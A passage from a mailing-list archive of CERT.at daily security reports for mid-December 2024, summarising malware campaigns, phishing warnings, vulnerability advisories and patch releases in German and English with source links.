https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-352-01 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 17.12.2024
by Daily end-of-shift report 17 Dec '24

17 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Montag 16-12-2024 18:00 − Dienstag 17-12-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Verbraucherzentrale warnt vor aktueller Paypal-Betrugsmasche ∗∗∗ --------------------------------------------- Die Verbraucherzentrale NRW warnt, dass Kriminelle "Bezahlen ohne Paypal-Konto" missbrauchen. Schutz davor ist kaum möglich. [..] Im Zentrum der Kritik steht eine Paypal-Bezahloption, die sich "Zahlen ohne Paypal-Konto" nennt und auch als "Gast-Konto" oder "Gastzahlung" bekannt ist. Damit können Käufer über das Lastschrift-Verfahren zahlen, ohne dass ein Paypal-Konto angelegt wird. Dafür ist eine IBAN anzugeben. --------------------------------------------- https://heise.de/-10202355 ∗∗∗ Malicious ads push Lumma infostealer via fake CAPTCHA pages ∗∗∗ --------------------------------------------- DeceptionAds can be seen as a newer and more dangerous variant of the "ClickFix" attacks, where victims are tricked into running malicious PowerShell commands on their machine, infecting themselves with malware. ClickFix actors have employed phishing emails, fake CAPTCHA pages on pirate software sites, malicious Facebook pages, and even GitHub issues redirecting users to dangerous landing pages. --------------------------------------------- https://www.bleepingcomputer.com/news/security/malicious-ads-push-lumma-inf… ∗∗∗ Over 25,000 SonicWall VPN Firewalls exposed to critical flaws ∗∗∗ --------------------------------------------- Over 25,000 publicly accessible SonicWall SSLVPN devices are vulnerable to critical severity flaws, with 20,000 using a SonicOS/OSX firmware version that the vendor no longer supports. [..] Public exposure means that the firewall's management or SSL VPN interfaces are accessible from the internet, presenting an opportunity for attackers to probe for vulnerabilities, outdated/unpatched firmware, misconfigurations, and brute-force weak passwords. --------------------------------------------- https://www.bleepingcomputer.com/news/security/over-25-000-sonicwall-vpn-fi… ∗∗∗ Sicherheitsbehörde warnt: Kernel-Schwachstelle in Windows wird aktiv ausgenutzt ∗∗∗ --------------------------------------------- Konkret geht es um die Sicherheitslücke CVE-2024-35250. Diese ermöglicht es Angreifern, auf anfälligen Systemen ihre Rechte auszuweiten. Nach Angaben der US-Cybersicherheitsbehörde Cisa gibt es neuerdings Hinweise auf eine aktive Ausnutzung. [..] Patches gegen CVE-2024-35250 stehen schon seit Juni für alle anfälligen Betriebssysteme bereit und dürften daher auf den meisten Systemen längst eingespielt worden sein. --------------------------------------------- https://www.golem.de/news/sicherheitsbehoerde-warnt-kernel-schwachstelle-in… ∗∗∗ Python Delivering AnyDesk Client as RAT, (Tue, Dec 17th) ∗∗∗ --------------------------------------------- Yesterday, I found an interesting piece of Python script that will install AnyDesk on the victim’s computer. Even better, it reconfigures the tool if it is already installed. The script, called “an5.py” has a low VT score (6/63). Note that the script is compatible with Windows and Linux victims. --------------------------------------------- https://isc.sans.edu/diary/rss/31524 ∗∗∗ Technical Analysis of RiseLoader ∗∗∗ --------------------------------------------- In October 2024, Zscaler ThreatLabz came across malware samples that use a network communication protocol that is similar to RisePro. However, unlike RisePro which has primarily been used for information stealing, this new malware specializes in downloading and executing second-stage payloads. Due its distinctive focus and similarities with RisePro’s communication protocol, we named this new malware family RiseLoader. --------------------------------------------- https://www.zscaler.com/blogs/security-research/technical-analysis-riseload… ∗∗∗ Earth Koshchei Coopts Red Team Tools in Complex RDP Attacks ∗∗∗ --------------------------------------------- APT group Earth Koshchei, suspected to be sponsored by the SVR, executed a large-scale rogue RDP campaign using spear-phishing emails, red team tools, and sophisticated anonymization techniques to target high-profile sectors. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/l/earth-koshchei.html ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (gstreamer1.0), Fedora (jupyterlab and python-notebook), Oracle (gimp:2.8.22, gstreamer1-plugins-base, gstreamer1-plugins-good, kernel, php:8.2, postgresql, and python3.11), SUSE (aws-iam-authenticator, firefox, installation-images, kernel, libaom, libyuv, libsoup, libsoup2, python-aiohttp, socat, thunderbird, and vim), and Ubuntu (curl, Docker, imagemagick, and kernel). --------------------------------------------- https://lwn.net/Articles/1002496/ ∗∗∗ CrushFTP: Attacken auf Admins möglich ∗∗∗ --------------------------------------------- Angreifer können in Logs von CrushFTP Schadcode verstecken. Dagegen gerüstete Versionen sind verfügbar. --------------------------------------------- https://heise.de/-10202537 ∗∗∗ Xen Security Advisory CVE-2024-53241 / XSA-466 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-466.html ∗∗∗ Xen Security Advisory CVE-2024-53240 / XSA-465 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-465.html ∗∗∗ Rockwell Automation PowerMonitor 1000 Remote ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-352-03 ∗∗∗ Hitachi Energy TropOS Devices Series 1400/2400/6400 ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-352-02 ∗∗∗ ThreatQuotient ThreatQ Platform ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-352-01 ∗∗∗ MISP v2.5.3 and v2.4.201 released with numerous enhancements, bug fixes, and security improvements to strengthen threat information sharing capabilities. ∗∗∗ --------------------------------------------- https://github.com/MISP/MISP/releases/tag/v2.5.3 ∗∗∗ BD Diagnostic Solutions Products ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-352-01 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 16.12.2024
by Daily end-of-shift report 16 Dec '24

16 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 13-12-2024 18:00 − Montag 16-12-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Microsoft Update-Katalog: Kritische Lücke in Microsofts Webserver entdeckt ∗∗∗ --------------------------------------------- Angreifer konnten sich auf einem Webserver von Microsoft erweiterte Rechte verschaffen. Trotz versprochener Transparenz nennt der Konzern keine Details. --------------------------------------------- https://www.golem.de/news/microsoft-update-katalog-kritische-luecke-in-micr… ∗∗∗ Angriffe auf Citrix Netscaler Gateway: Hersteller gibt Hinweise zum Schutz ∗∗∗ --------------------------------------------- Seit Dezember 2024 gibt es ja massiven Angriffswellen Citrix Netscaler Gateways. [..] Nun hat Citrix reagiert, und gibt Tipps, wie sich Netscaler Gateways gegen die Angriffe … Weiterlesen →Quelle --------------------------------------------- https://www.borncity.com/blog/2024/12/15/angriffe-auf-citrix-netscaler-gate… ∗∗∗ 390,000 WordPress accounts stolen from hackers in supply chain attack ∗∗∗ --------------------------------------------- A threat actor tracked as MUT-1244 has stolen over 390,000 WordPress credentials in a large-scale, year-long campaign targeting other threat actors using a trojanized WordPress credentials checker. --------------------------------------------- https://www.bleepingcomputer.com/news/security/390-000-wordpress-accounts-s… ∗∗∗ The Simple Math Behind Public Key Cryptography ∗∗∗ --------------------------------------------- The security system that underlies the internet makes use of a curious fact: You can broadcast part of your encryption to make your information much more secure. --------------------------------------------- https://www.wired.com/story/how-public-key-cryptography-really-works-using-… ∗∗∗ NodeLoader Exposed: The Node.js Malware Evading Detection ∗∗∗ --------------------------------------------- Zscaler ThreatLabz discovered a malware campaign leveraging Node.js applications for Windows to distribute cryptocurrency miners and information stealers. We have named this malware family NodeLoader, since the attackers employ Node.js compiled executables to deliver second-stage payloads, including XMRig, Lumma, and Phemedrone Stealer. --------------------------------------------- https://www.zscaler.com/blogs/security-research/nodeloader-exposed-node-js-… ∗∗∗ Phishing-Nachricht „Ihr Konto wurde gesperrt“ im Namen von Meta ignorieren! ∗∗∗ --------------------------------------------- Sie erhalten eine Nachricht von Meta, in der Ihnen mitgeteilt wird, dass Ihr Facebook- oder Instagram-Konto demnächst gesperrt wird. Um dies zu verhindern, müssen Sie auf einen Link klicken und Ihr Konto verifizieren. Aber Vorsicht: Es handelt sich um eine Phishing-Nachricht von Kriminellen, die Ihre Daten stehlen wollen! --------------------------------------------- https://www.watchlist-internet.at/news/phishing-nachricht-im-namen-von-meta/ ∗∗∗ Crypted Hearts: Exposing the HeartCrypt Packer-as-a-Service Operation ∗∗∗ --------------------------------------------- Analysis of packer-as-a-service (PaaS) HeartCrypt reveals its use in over 2k malicious payloads across 45 malware families since its early 2024 appearance. --------------------------------------------- https://unit42.paloaltonetworks.com/packer-as-a-service-heartcrypt-malware/ ∗∗∗ CoinLurker: The Stealer Powering the Next Generation of Fake Updates ∗∗∗ --------------------------------------------- The evolution of fake update campaigns has advanced significantly with the emergence of CoinLurker, a sophisticated stealer designed to exfiltrate data while evading detection. Written in Go, CoinLurker employs cutting-edge obfuscation and anti-analysis techniques, making it a highly effective tool in modern cyberattacks. --------------------------------------------- https://blog.morphisec.com/coinlurker-the-stealer-powering-the-next-generat… ∗∗∗ Secure Coding: CWE 1123 – Sich selbst modifizierenden Code vermeiden ∗∗∗ --------------------------------------------- Die Common Weakness Enumeration CWE-1123 warnt vor dem übermäßigen Einsatz von sich selbst modifizierendem Code. Java-Entwickler sollten mit Bedacht agieren. --------------------------------------------- https://heise.de/-10194617 ∗∗∗ CISA and EPA Warn: Internet-Exposed HMIs Pose Serious Cybersecurity Risks to Water Systems ∗∗∗ --------------------------------------------- The Cybersecurity and Infrastructure Security Agency (CISA) and the Environmental Protection Agency (EPA) have jointly released a crucial fact sheet highlighting the cybersecurity risks posed by Internet-exposed Human Machine Interfaces (HMIs) in the Water and Wastewater Systems (WWS) sector. --------------------------------------------- https://thecyberexpress.com/exposed-human-machine-interfaces-in-wws/ ∗∗∗ The Qualcomm DSP Driver - Unexpectedly Excavating an Exploit ∗∗∗ --------------------------------------------- This blog post provides a technical analysis of exploit artifacts provided to us by Google's Threat Analysis Group (TAG) from Amnesty International. --------------------------------------------- https://googleprojectzero.blogspot.com/2024/12/qualcomm-dsp-driver-unexpect… ∗∗∗ Tech Guide: Detecting NoviSpy spyware with AndroidQF and the Mobile Verification Toolkit (MVT) ∗∗∗ --------------------------------------------- Amnesty Security Lab has published Indicators of Compromise (IOCs) for the NoviSpy spyware application. This tutorial explains how to use AndroidQF Android Quick Forensics (androidqf) and Mobile Verification Toolkit (MVT) to examine an Android device for traces of these indicators. --------------------------------------------- https://securitylab.amnesty.org/latest/2024/12/tech-guide-detecting-novispy… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (gst-plugins-base1.0, gstreamer1.0, and libpgjava), Fedora (bpftool, chromium, golang-x-crypto, kernel, kernel-headers, linux-firmware, pytest, python3.10, subversion, and thunderbird), Gentoo (NVIDIA Drivers), Oracle (kernel, perl-App-cpanminus:1.7044, php:7.4, php:8.1, php:8.2, postgresql, python3.11, python3.12, python3.9:3.9.21, python36:3.6, ruby, and ruby:2.5), SUSE (docker-stable, firefox-esr, gstreamer, gstreamer-plugins-base, gstreamer-plugins-good, kernel, python-Django, python312, and socat), and Ubuntu (mpmath). --------------------------------------------- https://lwn.net/Articles/1002338/ ∗∗∗ Siemens: SSA-928984 V1.0: Heap-based Buffer Overflow Vulnerability in User Management Component (UMC) ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-928984.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 13.12.2024
by Daily end-of-shift report 13 Dec '24

13 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 12-12-2024 18:00 − Freitag 13-12-2024 18:05 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Social Engineering nach Mailbombing ∗∗∗ --------------------------------------------- Rapid7 hat vor Kurzem einen Blogbeitrag zur Vorgehensweise einer Ransomwaregruppe veröffentlicht, wir haben inzwischen von mehreren Firmen in Österreich gehört, die dieses Angriffsmuster selber beobachten mussten: Zuerst wird ein Mitarbeiter der Zielfirma mit E-Mail überschüttet: in vielen Fällen sind das legitime Newsletter, die aber in der Masse ein echtes Problem sind. Danach wird dieser Angestellte per Teams oder über andere Kanäle kontaktiert: Man sei der Helpdesk und will ihm bei der Bewältigung der Mail-Lawine helfen. --------------------------------------------- https://www.cert.at/de/aktuelles/2024/12/social-engineering-nach-mailbombing ∗∗∗ Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion ∗∗∗ --------------------------------------------- In this blog entry, we discuss a social engineering attack that tricked the victim into installing a remote access tool, triggering DarkGate malware activities and an attempted C&C connection. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html ∗∗∗ Germany sinkholes BadBox malware pre-loaded on Android devices ∗∗∗ --------------------------------------------- Germanys Federal Office for Information Security (BSI) has disrupted the BadBox malware operation pre-loaded in over 30,000 Android IoT devices sold in the country. [..] Germany's cybersecurity agency says it blocked communication between the BadBox malware devices and their command and control (C2) infrastructure by sinkholing DNS queries so that the malware communicates with police-controlled servers rather than the attacker's command and control servers. --------------------------------------------- https://www.bleepingcomputer.com/news/security/germany-sinkholes-badbox-mal… ∗∗∗ Efforts to Secure US Telcos Beset by Salt Typhoon Might Fall Flat ∗∗∗ --------------------------------------------- The rules necessary to secure US communications have already been in place for 30 years, argues Sen. Wyden, the FCC just hasnt enforced them. Its unclear if they will help. --------------------------------------------- https://www.darkreading.com/vulnerabilities-threats/efforts-secure-us-telco… ∗∗∗ IoT Cloud Cracked by Open Sesame Over-the-Air Attack ∗∗∗ --------------------------------------------- Researchers demonstrate how to hack Ruijie Reyee access points without Wi-Fi credentials or even physical access to the device. --------------------------------------------- https://www.darkreading.com/ics-ot-security/iot-cloud-cracked-open-sesame-a… ∗∗∗ Windows Tooling Updates: OleView.NET ∗∗∗ --------------------------------------------- This is a short blog post about some recent improvements I've been making to the OleView.NET tool which has been released as part of version 1.16. The tool is designed to discover the attack surface of Windows COM and find security vulnerabilities such as privilege escalation and remote code execution. --------------------------------------------- https://googleprojectzero.blogspot.com/2024/12/windows-tooling-updates-olev… ∗∗∗ New Linux Rootkit PUMAKIT Uses Advanced Stealth Techniques to Evade Detection ∗∗∗ --------------------------------------------- Cybersecurity researchers have uncovered a new Linux rootkit called PUMAKIT that comes with capabilities to escalate privileges, hide files and directories, and conceal itself from system tools, while simultaneously evading detection. --------------------------------------------- https://thehackernews.com/2024/12/new-linux-rootkit-pumakit-uses-advanced.h… ∗∗∗ Attacking Entra Metaverse: Part 1 ∗∗∗ --------------------------------------------- This first blog post is a short one, and demonstrates how complete control of an Entra user is equal to compromise of the on-premises user. For the entire blog series the point I am trying to make is this: The Entra Tenant is the trust boundary --------------------------------------------- https://posts.specterops.io/attacking-entra-metaverse-part-1-c9cf8c4fb4ee?s… ===================== = Vulnerabilities = ===================== ∗∗∗ DevSecOps-Plattform Gitlab: Accountübernahme möglich ∗∗∗ --------------------------------------------- In einem Beitrag schreiben die Entwickler, dass auf Gitlab.com bereits die abgesicherten Ausgaben laufen. Für selbstverwaltete Gitlab-Installation sind nun die Ausgaben 17.4.6, 17.5.4 und 17.6.2 in der Community Edition und Enterprise Edition erschienen. [..] Insgesamt haben die Entwickler zwölf Sicherheitslücken geschlossen. Zwei davon sind mit dem Bedrohungsgrad "hoch" eingestuft (CVE-2024-11274, CVE-2024-8233). Im ersten Fall können Angreifer durch Manipulation von Kubernetes-Proxy-Responses Accounts übernehmen. --------------------------------------------- https://heise.de/-10198923 ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (chromium, pgpool2, and smarty4), Fedora (chromium, linux-firmware, matrix-synapse, open62541, and thunderbird), Red Hat (kernel, kernel-rt, python3.11, python3.12, python3.9:3.9.18, python3.9:3.9.21, and ruby:2.5), SUSE (buildah, chromium, govulncheck-vulndb, java-1_8_0-ibm, libsvn_auth_gnome_keyring-1-0, python310-Django, qemu, and radare2), and Ubuntu (linux, linux-aws, linux-aws-6.8, linux-gcp, linux-gcp-6.8, linux-gke, linux-ibm, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-oem-6.8, linux-oracle, linux-oracle-6.8, linux-raspi, linux, linux-gcp, linux-gcp-5.4, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-kvm, linux-raspi, linux-xilinx-zynqmp, linux-gkeop, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, php7.0, php7.2, python-asyncssh, and smarty3). --------------------------------------------- https://lwn.net/Articles/1002036/ ∗∗∗ Schneider Electric Security Advisories 10.12.2024 ∗∗∗ --------------------------------------------- https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.… ∗∗∗ Mozilla: Security Vulnerabilities fixed in Thunderbird 115.18 ∗∗∗ --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/mfsa2024-70/ ∗∗∗ F5: K000148969: Python vulnerability CVE-2024-7592 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000148969 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 12.12.2024
by Daily end-of-shift report 12 Dec '24

12 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 11-12-2024 18:00 − Donnerstag 12-12-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Apache issues patches for critical Struts 2 RCE bug ∗∗∗ --------------------------------------------- More details released after devs allowed weeks to apply fixes. We now know the remote code execution vulnerability in Apache Struts 2 disclosed back in November carries a near-maximum severity rating following the publication of the CVE. [..] Considering remote attackers could exploit the vulnerability without requiring any privileges, combined with the high impact to system confidentiality, integrity, and availability, it's likely the Apache Foundation withheld the juiciest details to allow customers to upgrade to a safe version (Struts 6.4.0 or greater). --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/12/12/apache_strut… ∗∗∗ Cyber Resilience Act: Vernetzte Produkte müssen bald besser abgesichert sein ∗∗∗ --------------------------------------------- Die EU-Verordnung zur Cyber-Widerstandsfähigkeit ist in Kraft getreten. Hersteller vernetzter Produkte müssen künftig ein Mindestmaß an Cybersicherheit bieten. --------------------------------------------- https://heise.de/-10197273 ∗∗∗ Modular Java Backdoor Dropped in Cleo Exploitation Campaign ∗∗∗ --------------------------------------------- While investigating incidents related to Cleo software exploitation, Rapid7 Labs and MDR team discovered a novel, multi-stage attack that deploys an encoded Java Archive (JAR) payload. --------------------------------------------- https://www.rapid7.com/blog/post/2024/12/11/etr-modular-java-backdoor-dropp… ∗∗∗ The Bite from Inside: The Sophos Active Adversary Report ∗∗∗ --------------------------------------------- A sea change in available data fuels fresh insights from the first half of 2024. --------------------------------------------- https://news.sophos.com/en-us/2024/12/12/active-adversary-report-2024-12/ ∗∗∗ Vorsicht beim Online-Kauf von Weihnachtsbäumen: So erkennen Sie unseriöse Shops ∗∗∗ --------------------------------------------- Die Vorweihnachtszeit ist für viele mit Stress und hohen Ausgaben verbunden - da scheint ein günstiger und schnell aufgestellter Weihnachtsbaum verlockend. Besonders im Trend liegen faltbare Weihnachtsbäume, die in Rekordzeit aufgestellt sein sollen. Doch Vorsicht: Nicht alle Anbieter halten, was sie versprechen. Wir zeigen, woran man unseriöse Angebote erkennt. --------------------------------------------- https://www.watchlist-internet.at/news/unserioese-shops-beim-weihnachtsbaum… ∗∗∗ 300,000+ Prometheus Servers and Exporters Exposed to DoS Attacks ∗∗∗ --------------------------------------------- In this research we highlighted vulnerabilities and flaws in the Prometheus stack. We highlight the risks associated with exposing Prometheus servers and exporters to the internet without authentication, which expose sensitive information and can be exploited to launch DoS attacks or even execute arbitrary code through compromised exporters. --------------------------------------------- https://blog.aquasec.com/300000-prometheus-servers-and-exporters-exposed-to… ∗∗∗ Bis zum Burn-out: Open-Source-Entwickler von KI-Bug-Reports genervt ∗∗∗ --------------------------------------------- Sie kommen freundlich und wohl durchdacht daher: Doch bei genauerer Prüfung stellen Open-Source-Maintainer fest, dass immer mehr Bugreports KI-Unsinn sind. --------------------------------------------- https://heise.de/-10195951 ===================== = Vulnerabilities = ===================== ∗∗∗ Hunk Companion WordPress plugin exploited to install vulnerable plugins ∗∗∗ --------------------------------------------- The issue impacts all versions of Hunk Companion before the latest 1.9.0, released yesterday, which addressed the problem. While investigating a WordPress site infection, WPScan discovered active exploitation of CVE-2024-11972 to install a vulnerable version of WP Query Console. [..] By installing outdated plugins with known vulnerabilities with available exploits, the attackers can access a large pool of flaws that lead to remote code execution (RCE), SQL injection, cross-site scripting (XSS) flaws, or create backdoor admin accounts. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hunk-companion-wordpress-plu… ∗∗∗ Apple Updates Everything (iOS, iPadOS, macOS, watchOS, tvOS, visionOS), (Wed, Dec 11th) ∗∗∗ --------------------------------------------- Apple today released patches for all of its operating systems. The updates address 46 different vulnerabilities. Many of the vulnerabilities affect more than one operating system. None of the vulnerabilities are labeled as being already exploited. --------------------------------------------- https://isc.sans.edu/diary/rss/31514 ∗∗∗ Atlassian schützt Confluence & Co. vor möglichen DoS-Attacken ∗∗∗ --------------------------------------------- Angreifer können an zehn Sicherheitslücken in Atlassian Bamboo, Bitbucket und Confluence ansetzen und unter anderem Abstürze provozieren. --------------------------------------------- https://heise.de/-10196643 ∗∗∗ Sicherheitspatch: Angreifer können über TeamViewer-Lücke Windows-Dateien löschen ∗∗∗ --------------------------------------------- Basierend auf einer Warnmeldung ist die Komponente TeamViewer Patch & Asset Management angreifbar (CVE-2024-12363 "hoch"). Die Komponente ist aber standardmäßig nicht installiert. Sie ist optional im Kontext des Remote-Management-Features installierbar. [..] Die Entwickler versichern, dass sich das Sicherheitsupdate automatisch installiert. --------------------------------------------- https://heise.de/-10196765 ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (libsoup2.4, python-aiohttp, and upx-ucl), Fedora (iaito, python3.11, python3.9, and radare2), Red Hat (ruby, ruby:2.5, and ruby:3.1), Slackware (mozilla-thunderbird), SUSE (govulncheck-vulndb, nodejs18, nodejs20, and socat), and Ubuntu (ofono and python-tornado). --------------------------------------------- https://lwn.net/Articles/1001863/ ∗∗∗ Paloalto: PAN-SA-2024-0017 Chromium: Monthly Vulnerability Updates (Severity: MEDIUM) ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/PAN-SA-2024-0017 ∗∗∗ Tenable: [R1] Security Center Version 6.5.1 Fixes Multiple Vulnerabilities ∗∗∗ --------------------------------------------- https://www.tenable.com/security/tns-2024-20 ∗∗∗ Drupal: Open Social - Moderately critical - Access bypass - SA-CONTRIB-2024-076 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-076 ∗∗∗ Drupal: Allow All File Extensions for file fields - Critical - Unsupported - SA-CONTRIB-2024-075 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-075 ∗∗∗ Drupal: Git Utilities for Drupal - Critical - Unsupported - SA-CONTRIB-2024-074 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-074 ∗∗∗ Drupal: Login Disable - Critical - Access bypass - SA-CONTRIB-2024-073 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-073 ∗∗∗ Drupal: Browser Back Button - Moderately critical - Cross site scripting - SA-CONTRIB-2024-072 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-072 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 11.12.2024
by Daily end-of-shift report 11 Dec '24

11 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 10-12-2024 18:00 − Mittwoch 11-12-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Global Ongoing Phishing Campaign Targets Employees Across 12 Industries ∗∗∗ --------------------------------------------- Cybersecurity researchers at Group-IB have exposed an ongoing phishing operation that has been targeting employees and associates from over 30 companies across 12 industries and 15 jurisdictions. [..] What makes this campaign dangerous is the use of advanced techniques designed to bypass Secure Email Gateways (SEGs) and evade detection. [..] This campaign is ongoing therefore, companies need to watch out for what comes to their inbox. --------------------------------------------- https://hackread.com/ongoing-phishing-campaign-targets-employees/ ∗∗∗ AMD’s trusted execution environment blown wide open by new BadRAM attack ∗∗∗ --------------------------------------------- On Tuesday, an international team of researchers unveiled BadRAM, a proof-of-concept attack that completely undermines security assurances that chipmaker AMD makes to users of one of its most expensive and well-fortified microprocessor product lines. Starting with the AMD Epyc 7003 processor, a feature known as SEV-SNP—short for Secure Encrypted Virtualization and Secure Nested Paging—has provided the cryptographic means for certifying that a VM hasn’t been compromised by any sort of backdoor installed by someone with access to the physical machine running it. --------------------------------------------- https://arstechnica.com/information-technology/2024/12/new-badram-attack-ne… ∗∗∗ Microsoft MFA AuthQuake Flaw Enabled Unlimited Brute-Force Attempts Without Alerts ∗∗∗ --------------------------------------------- Cybersecurity researchers have flagged a "critical" security vulnerability in Microsofts multi-factor authentication (MFA) implementation that allows an attacker to trivially sidestep the protection and gain unauthorized access to a victims account. [..] Following responsible disclosure, the issue – codenamed AuthQuake – was addressed by Microsoft in October 2024. --------------------------------------------- https://thehackernews.com/2024/12/microsoft-mfa-authquake-flaw-enabled.html ∗∗∗ Decrypting Full Disk Encryption with Dissect ∗∗∗ --------------------------------------------- Back in 2022 Fox-IT decided to open source its proprietary incident response tooling known as Dissect. [..] One of the most popular requests has been the capability to use Dissect in combination with common disk encryption methods like Microsoft’s BitLocker or its Linux equivalent LUKS. Internally at Fox-IT we were able to already use these capabilities. With the release of Dissect version 3.17 these capabilities are now also available to the community at large. --------------------------------------------- https://blog.fox-it.com/2024/12/11/decrypting-full-disk-encryption-with-dis… ∗∗∗ The Stealthy Stalker: Remcos RAT ∗∗∗ --------------------------------------------- As cyberattacks become more sophisticated, understanding the mechanisms behind RemcosRAT and adopting effective security measures are crucial to protecting your systems from this growing threat. This blog presents a technical analysis of two RemcosRAT variants. --------------------------------------------- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-stealthy-stalker-r… ∗∗∗ How easily access cards can be cloned and why your PACS might be vulnerable ∗∗∗ --------------------------------------------- PACS can be bad, but also good if you configure them right. These systems protect your building, and control access to your most sensitive systems. Give them some love. --------------------------------------------- https://www.pentestpartners.com/security-blog/how-easily-access-cards-can-b… ∗∗∗ Zeitplan veröffentlicht: Lets Encrypt schafft OCSP-Zertifikatsüberprüfung ab ∗∗∗ --------------------------------------------- Das Protokoll zur Echtzeit-Gültigkeitsprüfung hat Datenschutzprobleme. Die weltgrößte CA ersetzt es nun durch Zertifikats-Sperrlisten. --------------------------------------------- https://heise.de/-10195107 ===================== = Vulnerabilities = ===================== ∗∗∗ Ivanti: December Security Update ∗∗∗ --------------------------------------------- Today, fixes have been released for the Ivanti solutions detailed below. [..] Ivanti Cloud Service Application, Ivanti Desktop and Server Management (DSM), Ivanti Connect Secure and Policy Secure, Ivanti Sentry, Ivanti Patch SDK, Ivanti Application Control, Ivanti Automation, Ivanti Workspace Control, Ivanti Performance Manager, Ivanti Security Controls (iSec) [..] Ivanti Cloud Services Application (CSA) 10.0 (Critical): An authentication bypass in the admin web console of Ivanti CSA before 5.0.3 allows a remote unauthenticated attacker to gain administrative access. CVE-2024-11639 --------------------------------------------- https://www.ivanti.com/blog/december-security-update ∗∗∗ Microsoft Security Update Summary (10. Dezember 2024) ∗∗∗ --------------------------------------------- Am 10. Dezember 2024 hat Microsoft Sicherheitsupdates für Windows-Clients und -Server, für Office – sowie für weitere Produkte – veröffentlicht. Die Sicherheitsupdates beseitigen 70 Schwachstellen (CVEs), davon 16 kritische Sicherheitslücken, davon eine als 0-day klassifiziert (bereits ausgenutzt). --------------------------------------------- https://www.borncity.com/blog/2024/12/10/microsoft-security-update-summary-… ∗∗∗ Solarwinds Web Help Desk: Software-Update schließt kritische Lücken ∗∗∗ --------------------------------------------- In Solarwinds Web Help Desk haben die Entwickler teils kritische Sicherheitslücken korrigiert. IT-Verantwortliche sollten rasch aktualisieren. --------------------------------------------- https://heise.de/-10195207 ∗∗∗ Patchday: Adobe schließt mehr als 160 Sicherheitslücken in Acrobat & Co. ∗∗∗ --------------------------------------------- Insgesamt hat der Softwarehersteller mehr als 160 Schwachstellen mit Updates für die Produkte geschlossen. --------------------------------------------- https://www.heise.de/-10194979 ∗∗∗ Synology-SA-24:28 Media Server ∗∗∗ --------------------------------------------- A vulnerability allows remote attackers to read specific files. --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_24_28 ∗∗∗ PDQ Deploy allows reuse of deleted credentials that can compromise a device and facilitate lateral movement ∗∗∗ --------------------------------------------- The CERT/CC is creating this Vulnerability Note to advise and make users of PDQ Deploy aware of potential avenues of attack through the deploy service. System administrators that are using PDQ Deploy should employ LAPS to mitigate this vulnerability. --------------------------------------------- https://kb.cert.org/vuls/id/164934 ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (proftpd-dfsg and smarty3), Fedora (python3.14), Gentoo (Distrobox, eza, idna, libvirt, and OpenSC), Red Hat (container-tools:rhel8 and edk2), SUSE (avahi, curl, libsoup2, lxd, nodejs20, python-Django, python310-Django4, python312, squid, and webkit2gtk3), and Ubuntu (expat, intel-microcode, linux, linux-aws, linux-kvm, linux-lts-xenial, and shiro). --------------------------------------------- https://lwn.net/Articles/1001728/ ∗∗∗ Mozilla: Security Vulnerabilities fixed in Thunderbird 128.5.2 ∗∗∗ 